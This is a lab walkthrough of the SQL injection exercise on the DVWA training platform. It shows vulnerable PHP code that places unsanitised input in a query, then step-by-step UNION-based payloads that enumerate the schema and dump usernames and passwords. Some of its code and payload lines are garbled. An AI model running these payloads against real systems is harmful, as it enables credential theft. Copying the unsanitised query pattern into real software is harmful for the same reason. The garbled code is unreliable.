DVWA Platform V1.8-sql Injection

Code

<?php     if (isset ($_get[' Submit ')) {          //Retrieve data          $id = $_get[' id ');     $getid = "Select First_Name, last_name from users WHERE user_id = ' $id '";     $result = mysql_query ($getid) or Die (' <pre> '. Mysql_error (). ' </pre> ');     $num = Mysql_numrows ($result);     $i = 0;     while ($i < $num) {         $first = mysql_result ($result, $i, "first_name");         $last = mysql_result ($result, $i, "last_name");                  Echo ' <pre> ';         Echo ' ID: '. $id. ' <br> name: '. $first. ' <br> surname: '. $last;         Echo ' </pre> ';         $i + +;     } }?>

The code does not detect and filter the incoming ID, and it is injected into the character type

Submit 1, search

Submit single quotation mark, error

Submit 1 and 1=1, query, return correct

Submit 1 and 1=2, query, return correct

Submit 1 ' and ' 1 ' = ' 1, query, return correct

Submit 1 ' and ' 1 ' = ' 2, query, no return

Judging by the character type injection

Order BY Query Field number

1 ' ORDER by #, return correct

1 ' ORDER by *, return correct

1 ' ORDER by 3#, return error

There are two of fields

Explode field

1 ' Union Select 1,2#

Check the database version and the current database name

1 ' Union select version (), Database () #

The database version is 5.5.40, the current database is named DVWA

Querying tables in a database

1 ' UNION SELECT 1,GROUP_CONCAT (table_name) from Information_schema.tables where Table_schema=database () #

With guestbook and users two tables

Query users for this table

1 ' Union Select 1,GROUP_CONCAT (column_name) from Information_schema.columns where Table_schema=database () and Table_ name=0x7573657273#

NOTE: table_name followed by the hex value of users

Read the contents of user and password

-1 ' Union select User,password from users#

DVWA Platform V1.8-sql Injection